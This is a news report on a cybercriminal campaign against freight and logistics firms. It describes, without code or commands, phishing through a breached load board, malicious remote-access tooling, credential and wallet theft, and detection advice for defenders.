Cybercriminals targeting trucking and logistics companies are increasingly linking digital intrusions to real-world cargo theft and payment diversion, with researchers describing a coordinated pattern of remote access campaigns tied to organized crime and growing financial losses.
The activity points to a wider rise in cyber-enabled freight theft, in which attackers infiltrate logistics operations, hijack cargo bids and steal goods. Losses in North America are described as reaching $6.6 billion in 2025, underscoring how cyberattacks are being used to disrupt supply chains and generate profit.
Remote Access Campaigns Target Freight Operations
Researchers said the attackers targeted transportation organizations and, in one observed case in late February 2026, executed a malicious payload inside a controlled decoy environment run by Deception.pro partners. The compromised environment remained exposed for more than a month, offering visibility into post-compromise activity, tooling and decision-making.
The findings build on earlier reporting from November 2025 that cybercriminals had been targeting trucking and logistics firms with remote monitoring and management tools to steal freight. Active since June 2025, the group was described as working with organized crime to loot goods, particularly food and beverages.
On February 27, 2026, attackers were said to have breached a load board platform and sent emails to carriers advertising fake shipping jobs. The message delivered a malicious VBS file that launched a PowerShell script, installed ScreenConnect for remote access and displayed a fake agreement to disguise the intrusion.
FCRF Returns With CDPO, Its Premier Data Protection Certification for Privacy Professionals
Persistence, Evasion and Financial Reconnaissance
Once inside, the attackers focused on maintaining long-term access by installing multiple remote management tools. Over the course of a month, they deployed several ScreenConnect instances along with Pulseway and SimpleHelp, creating overlapping access points in case one tool was detected or removed.
Researchers also described a new signing-as-a-service method used to deploy a stealthier ScreenConnect instance. A PowerShell chain reportedly bypassed controls, downloaded the installer, had it re-signed with a fraudulent but valid certificate and then installed it silently. Original components were replaced with signed versions to reduce the chance of detection, bypass revoked certificates and preserve trusted remote access.
After securing stable access, the attackers moved to hands-on activity. They manually checked accounts including PayPal and used a custom tool to search for and steal cryptocurrency wallet data, sending the results to Telegram.
Cargo Theft Threat Extends Beyond Initial Breach
The intrusion showed that financially motivated attackers were not stopping at initial access. Researchers said they used more than a dozen PowerShell scripts to profile victims, collecting user data, browser history and signs of access to banking, payment, logistics and accounting platforms. The scripts also copied locked files, searched for valuable services, stored data in hidden folders and ran with SYSTEM privileges.
Browser databases were repeatedly scanned, patterns were matched and findings were sent through Telegram, sometimes using delayed tasks to avoid controls. Targets included banks, money transfer services, fleet payment systems and freight platforms, indicating a clear focus on financial fraud and cargo diversion.
The report concludes that the operation reflects a broader move by attackers toward exploiting legitimate trust mechanisms to evade detection. For transportation, logistics and freight organizations, it reinforces the need to watch for unauthorized remote management tools, suspicious PowerShell activity and unusual browser telemetry linked to access to financial platforms.
